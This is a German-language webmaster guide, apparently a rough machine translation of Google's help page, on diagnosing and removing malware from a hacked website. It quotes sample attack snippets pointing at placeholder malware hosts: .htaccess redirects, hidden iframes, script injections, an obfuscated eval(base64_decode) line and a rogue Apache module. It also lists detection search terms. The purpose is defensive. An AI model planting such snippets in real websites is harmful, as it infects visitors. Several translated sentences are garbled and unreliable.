Mit Malware gehackt

Malware ist jede Software oder mobile App, die speziell dafür entwickelt wurde, eines Computers, eines Mobilgeräts, der darauf ausgeführten Software oder der Nutzer. Weitere Informationen zu Malware finden Sie unter Malware und unerwünschte Software.

Wenn Ihre Website Malware enthält, wird Nutzern normalerweise die Warnung angezeigt Die Meldung Diese Website kann Ihren Computer beschädigen, die in den Suchergebnissen oder auf einer Interstitial-Seite, die im Browser angezeigt wird, wenn der Nutzer versucht, Ihre etwa so:

<ph type="x-smartling-placeholder">
</ph> Darstellung der Malware-Interstitial-Seite
Suchergebnisse mit Malware-Warnung.

Sie benötigen dazu Folgendes:

  • Shell- oder Terminal-Administratorzugriff auf die Server Ihrer Website: Web, Datenbank, und Dateien.
  • Kenntnisse der Shell- oder Terminalbefehle
  • Die Fähigkeit, SQL-Abfragen in der Datenbank auszuführen.

Vorbereitung

  • Bei der Search Console registrieren und bestätigen Sie die Inhaberschaft Ihrer gehackten Website wie dort beschrieben. In der Search Console finden Sie Beispiele für betroffene Seiten. die Behebung von Hacking-mit-Malware-Problemen viel einfacher. Außerdem erhalten Sie eine Warnung, Ihre Website ist von vielen Arten von Malware oder anderen Hacks betroffen.

  • Google Safe Browsing-Diagnoseseite aufrufen um öffentliche Informationen darüber zu erhalten, ob eine Website potenziell schädlich für Nutzer ist. Den Status Ihrer Seite oder Website können Sie unter einer URL wie der folgenden einsehen: https://transparencyreport.google.com/safe-browsing/search?url=***&lt;&lt;page_or_site>>*** Beispiel: https://transparencyreport.google.com/safe-browsing/search?url=webmastercentralblog.blogspot.com

    <<page_or_site>> kann eine bestimmte Seiten-URL (http://example.com/badpage) oder Ihre gesamte Website (example.com) aus.

  • Verwende keinen Browser, um die Seiten deiner Website aufzurufen. Da Malware oft wird durch die Ausnutzung von Sicherheitslücken im Browser verbreitet, Seite in einem Browser kann Ihren Computer beschädigen. Es sei denn, die Diagnoseanweisungen um die Seite direkt in Ihrem Browser aufzurufen, verwenden Sie cURL oder Wget zum Ausführen von HTTP-Anfragen (z. B. um eine Seite abzurufen).

    Diese kostenlos verfügbaren Tools helfen bei der Diagnose von Weiterleitungen und Referrer- und User-Agent-Informationen einzubinden. Mit einem Referrer-URL oder User-Agent ist hilfreich, um Hacker nachzuahmen. könnten Hacker schädliche Inhalte nur an Nutzer mit bestimmten User-Agents oder Verweis-URLs, um mehr "echte Personen" zu erreichen und vermeiden, von Websiteinhabern und Malware-Scannern.

`curl -v --referer "http://www.google.com" <your-url>`

Hier ist ein Beispiel, in dem sowohl ein User-Agent als auch eine Referrer-URL angegeben sind:

`curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html`

Wir empfehlen, eine Seite mit und ohne --referer "https://www.google.com", da ein Teil der Malware nur aktiviert ist wenn Nutzer über Google-Suchergebnisse auf Ihre Website gelangen.

  • Erstellen Sie ein Dokument, um die Ergebnisse in diesem Schritt zu erfassen. Das Dokument wird (mindestens) den Namen und den Speicherort jeder beschädigten Datei enthalten. und Notizen darüber, wie es infiziert wurde. Sie dienen als Grundlage für Bereinigen und warten Sie Ihre Website.

  • Sehen Sie sich das Video weiter oben auf dieser Seite an, um zu erfahren, wie Malware funktioniert und wie Sie um Ihre Malware zu schützen.

Diagnose

Ermitteln Sie, welche Malware Ihre Website beeinträchtigt:

  1. Öffnen Sie den Bericht „Sicherheitsprobleme“. für Ihre Website in der Search Console. Maximieren Sie die Beschreibung der Malware-Warnung, um eine Liste der betroffenen Beispielseiten aufzurufen. Beachten Sie, dass diese Liste nicht vollständig ist. erhalten Sie möglicherweise keine Beispielseiten für alle Arten von Malware auf eurer Website.
  2. Testen Sie Ihre Beispielseiten auf die folgenden Arten von Malware.

Serverkonfigurations-Malware (unerwünschte Weiterleitungen)

Ein Hacker hat Ihre Website manipuliert und leitet Besucher von Ihrer Website weiter. an ihre Malware-Angriffs-Website weiterleiten, in der Regel durch eine Änderung der Konfigurationsdatei(en). In der Regel lassen sich Serverkonfigurationsdateien URL-Weiterleitungen für bestimmte Seiten oder Verzeichnisse auf einem Website. Auf Apache-Servern sind dies beispielsweise die Datei .htaccess und httpd.conf.

Diagnose

Rufen Sie einige der im Bericht "Sicherheitsprobleme" genannten Beispiel-URLs auf. Eine Antwort von einer mit der „Serverkonfiguration“ infizierten Seite kann die Infektion folgende Überschriften:

&lt; HTTP/1.1 301 Moved Permanently
&lt; Date: Sun, 24 Feb 2013 21:06:45 GMT
&lt; Server: Apache
&lt; Location: http://&lt;<strong>_malware-attack-site_</strong>&gt;/index.html
&lt; Content-Length: 253

Betroffene Dateien ermitteln

Über Shell oder Terminal-Zugriff auf dem Server anmelden (die Website kann offline sein) und die relevanten Serverkonfigurationsdateien überprüfen. Möglicherweise sind weitere als eine gehackte Serverkonfigurationsdatei auf Ihrer Website. Prüfen Sie diese Dateien auf unerwünschte Anweisungen, wie Weiterleitungen auf unbekannte Websites. Im Feld .htaccess-Datei sehen, sehen Sie möglicherweise eine Weiterleitung, die so aussieht:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*
**RewriteRule ^third-page.html($|/) http://&lt;<em><strong>_malware-site_</strong></em>&gt;/index.html** [R=301]

SQL-Injection

Ein Hacker hat die Datenbank Ihrer Website manipuliert. Zum Beispiel könnte der Hacker Sie haben programmatisch in jeden Datensatz einer Datenbank Schadcode eingefügt. Wenn der Server eine Seite lädt, die Informationen aus der ist der Schadcode in den Inhalt der Seite eingebettet und kann Website-Besuchern schaden.

Diagnose

  1. Führen Sie in der Befehlszeile einige Abfragen für die betroffenen URLs aus und prüfen Sie die Antwort für SQL-Angriffswörter wie „iframe“ oder „eval“.

  2. Melden Sie sich bei Ihrem Datenbankserver an oder rufen Sie Ihre Datenbank mit einem Tool wie phpMyAdmin. Wenn Wget oder cURL verwendet haben, versuchen Sie, den in der Quelle der Seite gefundenen Schaden zu korrelieren. über Wget oder cURL mit den tatsächlichen Datenbankeinträgen. Wenn beispielsweise Sie bemerkt haben, dass Ihre Seiten einen gefährlichen iFrame enthalten, können Sie eine SQL-Abfrage nach iFrame-Code suchen. Beispiel:

    SELECT * FROM blog_posts WHERE post_text LIKE '%&gt;iframe%';

  3. Sie können auch Datenbankprotokolle und Fehlerdateien auf Ihrem Server auf ungewöhnlichen Aktivitäten wie unerwartete SQL-Befehle, die für normale Nutzende oder Fehler.

Problem beheben

Aktualisieren Sie entweder jeden infizierten Datenbankeintrag oder stellen Sie Ihre letzte bekannte Datenbank wieder her. Back-up.

Code-Einschleusung

Seiten Ihrer Website wurden modifiziert und enthalten schädlichen Code, wie etwa einen iFrame, eine Malware-Angriffs-Website.

Diagnose

Rufen Sie einige der im Bericht „Sicherheitsprobleme“ aufgeführten Beispiel-URLs mit cURL oder wGet und prüfen Sie den Code auf verdächtigen Code. Eingefügter Code kann viele Typen haben schwer zu finden sind. Es kann hilfreich sein, nach Wörtern wie „iFrame“ zu suchen um zu finden, iFrame-Code. Weitere hilfreiche Suchbegriffe sind "script", "eval" und "unescape". Für Beispiel: Um in allen Dateien nach „iframe“ zu suchen auf Unix-basierten Systemen:

$grep -irn "iframe" ./ | less</pre>

Im Folgenden finden Sie einige häufige Malware-Muster, nach denen Sie Ausschau halten sollten.

Ein iFrame, der eine schädliche Website lädt:

&lt;iframe frameborder="0" height="0" src="http://&lt;<strong><em>_malware-site_</em></strong>&gt;/path/file"
  style="display:none" width="0"&gt;&lt;/iframe&gt;

JavaScript oder eine andere Skriptsprache, die Skripts von einer Angriffs-Website:

&lt;script type='text/javascript' src='http://&lt;<em><strong>_malware-site_</strong></em>&gt;/js/x55.js'&gt;&lt;/script&gt;

Skripts, die den Browser zu einer Angriffswebsite weiterleiten:

&lt;script&gt;
  if (document.referrer.match(/google\.com/)) {
    window.location("http://&lt;<em><strong>_malware-site_</strong></em>&gt;/");
  }
&lt;/script&gt;

Schädlicher Code, der verschleiert ist, um nicht entdeckt zu werden:

eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));

Dateien mit gemeinsam genutzten Objekten, die dazu dienen, willkürlich schädlichen Code in ansonsten harmlose Weise zu schreiben Skripts:

#httpd.conf modified by the hacker
LoadModule harmful_module modules/mod_harmful.so
AddModule mod_harmful.c

Schädliche Fehlervorlagen

Die für Fehlermeldungen wie „404 Datei nicht gefunden“ verwendete Vorlage ist konfiguriert um Malware zu verbreiten. So können Angreifer Angriffe auf URLs starten, die auf Ihrer Website gar nicht existieren.

Diagnose

Fordern Sie eine Seite an, die nicht existiert oder eine andere Art von und prüfen Sie, ob die Antwort von einer anderen Website Malware enthalten.

Problem beheben

Melden Sie sich bei Ihrem Webserver an und durchsuchen Sie die Serverkonfigurationsdateien nach Fehlern Seitenanweisungen. Die Fehlervorlage für Apache-Webserver kann beispielsweise in der Datei .htaccess deklariert sein. Hier ist ein Beispiel für eine .htaccess-Datei, ruft 404-Fehlerseiten von einer schädlichen Website ab:

ErrorDocument 404 http://&lt;<span class="red-text"><em><strong>_malware-site_</strong></em></span>&gt;/index.html

Wenn Sie zum Bereinigen Ihrer Website bereit sind, ersetzen Sie entweder die .htaccess-Datei(en) mit einer bekanntermaßen fehlerfreien Sicherung oder löschen Sie die unerwünschten ErrorDocument-Anweisungen auf der .htaccess Datei(en) vorhanden. Stellen Sie sicher, dass Sie auch die eigentlichen Fehlerdateien bereinigen, die auf Ihrer Website vorhanden sind. Starten Sie schließlich Ihren Webserver neu, um sicherzustellen, Änderungen wirksam werden.

Ressourcen, die von einer manipulierten oder schädlichen Website {compromised-resources} geladen werden

Ihre Website verwendet Inhalte oder Ressourcen einer Website, die bekanntermaßen bösartigen Inhalten. Dabei kann es sich um JavaScript-Dateien, Bilder oder andere Dateien handeln. Aus diesem Grund wird Ihre Website wegen Malware gekennzeichnet, die von diesem anderen Website.

Diagnose

Rufen Sie einige der im Bericht "Sicherheitsprobleme" genannten Beispiel-URLs auf.

Problem beheben

  1. Prüfen Sie das Problem, indem Sie einige der Beispiel-URLs aufrufen, die in der Bericht zu Sicherheitsproblemen in der Search Console. Sie sollten eine Browserwarnung sehen.
  2. In der Browserwarnung wird die Domain des fraglichen Inhalts angegeben. Entfernen Sie alle Verweise auf die Website, die in der Warnung aufgeführt ist. Wenn Inhalte einer gemeldeten Website ohne Ihr Wissen hinzugefügt wurden, kann das ist schwerwiegender. Ihre Website wurde höchstwahrscheinlich manipuliert sollten Sie Ihre Website weiterhin auf andere Hacks und Sicherheitslücken überprüfen.
  3. Wenn Sie absichtlich Inhalte von einer seriösen Website eingefügt haben, gekennzeichnet sind und Sie den Inhalt wieder verwenden möchten, nachdem die Website bereinigt haben, können Sie den Status der gemeldeten Website Google Safe Browsing-Diagnoseseite für diese Website (http://www.google.com/safebrowsing/diagnostic?site=www.example.com){:.external}. Die Inhaber seriöser Websites bereinigen diese in der Regel schnell.

Zusätzliche Untersuchung

Suchen Sie als Nächstes nach weiteren schädlichen Dateien oder Änderungen auf Ihrem System. Die Seiten oder Datensätze der Datenbank geändert, neue Spamseiten, geschriebene Funktionen, die Spam auf sauberen Seiten anzeigen, "Hintertüren" die es dem Hacker ermöglichen, auf Ihre Website zuzugreifen, bösartigen Code, den Sie entfernt haben.

Wenn Ihre Website online ist, sollten Sie sie zur Untersuchung offline nehmen.

Falls Sie über eine bekanntermaßen fehlerfreie Sicherung Ihrer Website verfügen, ermitteln Sie, welche Dateien die seit der Sicherung erstellt oder geändert wurden, und sie untersuchen. Auf Unix-Basis können Sie einen Befehl wie den folgenden verwenden, um neue Dateien zu suchen:

diff -qr <current-directory> <backup-directory>

Beispiel:

diff -qr www/ backups/full-backup-20120124/

auch:

md5sum <current-page> <backup-page>

Beispiel:

md5sum www/page.html backups/full-backup-20120124/page.html

Überprüfen Sie Server-, Zugriffs- und Fehlerprotokolle auf verdächtige Aktivitäten. fehlgeschlagene Anmeldeversuche, Befehlsverlauf (insbesondere als Root) und Erstellung von unbekannte Nutzerkonten. Beachten Sie, dass der Hacker diese Protokolle möglicherweise geändert hat. für ihre eigenen Zwecke nutzen. Im Video sehen Sie einige Beispiele für Ermitteln Sie die Sicherheitslücke.

Konfigurationsdateien auf Weiterleitungen prüfen Ihre Konfigurationsdateien werden in der Regel mit .htaccess und httpd.conf. Hacker schaffen oft bedingte basierend auf User-Agent, Tageszeit oder Referrer-URL. Bei Bedarf Konfigurationsdateien aktualisieren, müssen Sie möglicherweise Ihren Server für Ihre Änderungen wirksam werden.

Prüfen Sie, ob die Ordner- und Dateiberechtigungen zu langwierig sind. Hacker manipulieren Wenn der Websiteinhaber unentdeckte Berechtigungen hat, erhält der Hacker eine Möglichkeit, auf die Website zuzugreifen. Dateien größer als 644 (rw-r--r--) und Ordner, die größer als 755 (rwxr-xr-x) sind, können zur Sicherheit beitragen Probleme. Prüfen Sie, ob diese Berechtigungen auch stärker eingeschränkt werden können. An Auf Unix-basierten Systemen können Sie Folgendes ausprobieren:

find <your-dir> -type d -not -perm 755 -exec ls -ld {} \;

und:

find <your-dir> -type f -not -perm 644 -exec ls -la {} \;

Wenn Sie eine Datenbank haben, untersuchen Sie sie Datensatz für Datensatz mit einem Tool wie phpMyAdmin.